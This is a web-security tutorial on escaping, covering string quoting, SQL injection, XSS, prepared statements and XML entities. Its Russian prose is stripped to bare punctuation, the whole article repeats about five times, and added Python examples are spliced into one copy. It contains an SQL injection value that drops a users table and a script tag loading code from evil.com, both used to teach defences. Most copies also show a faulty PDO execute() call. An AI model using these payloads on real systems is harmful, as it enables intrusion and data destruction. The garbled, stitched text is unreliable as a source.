var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post">
  <p class="meta">
    Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo $post['body']; ?>
  </p>
</div>
, , :
<div class="post">
  <p class="meta">
    Posted by Plato on January 2, 15:31
  </p>
  <p class="body">
    I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
  </p>
</div>
, , , , :
<div class="post">
  <p class="meta">
    Posted by Pascal on November 23, 04:12
  </p>
  <p class="body">
    Basic math tells us that if x < n and y > n, x cannot be larger than y.
  </p>
</div>
... . , , , ?
<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
  </p>
</div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>
htmlspecialchars
, , . :
<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
  </p>
</div>
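The template and the three posts from the XSS walkthrough, rendered with and without escaping, as an added Python example that is not part of the original article. html.escape stands in for PHP's htmlspecialchars; the post data is constructed from the page's examples (the date is treated as an already-formatted server-side value, since only username and body come from users), and the function names render_post and contains_script_tag are chosen here.

```python
import html

# Constructed posts in the shape of the page's $post array. 'date' is the
# already-formatted server-side value; username and body are user input.
POSTS = {
    "plato": {
        "username": "Plato",
        "date": "January 2, 15:31",
        "body": 'I am said to have said "Lorem ipsum dolor sit amet".',
    },
    "pascal": {
        "username": "Pascal",
        "date": "November 23, 04:12",
        "body": "Basic math tells us that if x < n and y > n, x cannot be larger than y.",
    },
    "jacktr": {
        "username": "JackTR",
        "date": "July 18, 12:56",
        "body": '<script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>',
    },
}

# The page's template, flattened to one line so the output can be compared.
TEMPLATE = (
    '<div class="post"> <p class="meta"> Posted by {username} on {date} </p> '
    '<p class="body"> {body} </p> </div>'
)


def render_post(post, escape=True):
    """Render one post into the page's template.

    With escape=True each user-controlled field goes through html.escape,
    the Python counterpart of htmlspecialchars: & < > " ' become entities,
    so the browser displays them as characters instead of parsing them as
    markup. escape=False reproduces the page's vulnerable template.
    """
    enc = (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)
    return TEMPLATE.format(
        username=enc(post["username"]),
        date=post["date"],
        body=enc(post["body"]),
    )


def contains_script_tag(rendered):
    """Detection helper: does the rendered HTML still contain a <script tag?"""
    return "<script" in rendered.lower()
```

Pascal's "x < n" survives as "x &lt; n", which a browser shows as the original text, and JackTR's body turns into "&lt;script src=&quot;...", which the browser also shows as text; nothing is fetched from evil.com.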
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]); // execute() takes an array of values, one per placeholder
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
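The three ways of building the SQL lookup that the page contrasts, the plain concatenation from the injection walkthrough, the escaped version from the mysql_real_escape_string fix, and the prepared statement from the conclusion, run against an in-memory SQLite database, as an added Python example that is not part of the original article. SQLite and standard SQL write a quote inside a literal as two quotes rather than backslash-escaping it, so build_query_escaped follows that convention; the table rows and all function names are constructed here.

```python
import sqlite3

# Constructed inputs: the three names from the page's table.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]


def fresh_db():
    """In-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("Alex", "555-0100"), ("Mc'Donalds", "555-0101"), ("Joe", "555-0102")],
    )
    return conn


def build_query_naive(name):
    """The page's first attempt: the input is pasted straight into the SQL text."""
    return f"SELECT phone_number FROM users WHERE name = '{name}'"


def build_query_escaped(name):
    """The page's second attempt: the string-literal delimiter is escaped.

    mysql_real_escape_string uses MySQL's backslash convention; SQLite writes
    a quote inside a quoted literal as two quotes. The principle is the same:
    the character that would end the literal is neutralised, so the rest of
    the input stays inside the string.
    """
    escaped = name.replace("'", "''")
    return f"SELECT phone_number FROM users WHERE name = '{escaped}'"


def run_query(conn, sql):
    """Execute one built statement.

    Returns ("rows", [phone numbers]) on success or ("error", exception class
    name) if the database rejects it. sqlite3's execute() runs a single
    statement only (older versions signal this with sqlite3.Warning), so the
    'Joe' payload is refused here instead of executed; a driver that accepts
    multiple statements would run the DROP TABLE, which is the outcome the
    page describes.
    """
    try:
        return ("rows", [r[0] for r in conn.execute(sql).fetchall()])
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return ("error", type(exc).__name__)


def lookup_parameterized(conn, name):
    """The page's recommendation: a prepared statement with a placeholder.

    The SQL text is fixed; the value travels separately and is never parsed
    as SQL, so there is no escaping step to get wrong or forget.
    """
    sql = "SELECT phone_number FROM users WHERE name = ?"
    return [r[0] for r in conn.execute(sql, (name,)).fetchall()]


def users_table_exists(conn):
    """True while the users table is still in the schema."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row is not None


def table_survives(name, builder):
    """Build the statement with `builder`, run it, report whether users still exists."""
    conn = fresh_db()
    run_query(conn, builder(name))
    return users_table_exists(conn)


def compare_strategies(name):
    """Run one input through all three strategies, each on a fresh database."""
    return {
        "naive": run_query(fresh_db(), build_query_naive(name)),
        "escaped": run_query(fresh_db(), build_query_escaped(name)),
        "parameterized": lookup_parameterized(fresh_db(), name),
    }
```

For "Alex" all three agree. For "Mc'Donalds" the naive statement is a syntax error, while the escaped and parameterized lookups both find the row. For the "Joe" input the naive text is the page's two-statement string, the escaped version searches for a user whose whole name is that string and finds nothing, and the parameterized lookup does the same, with the users table intact in both cases.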
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
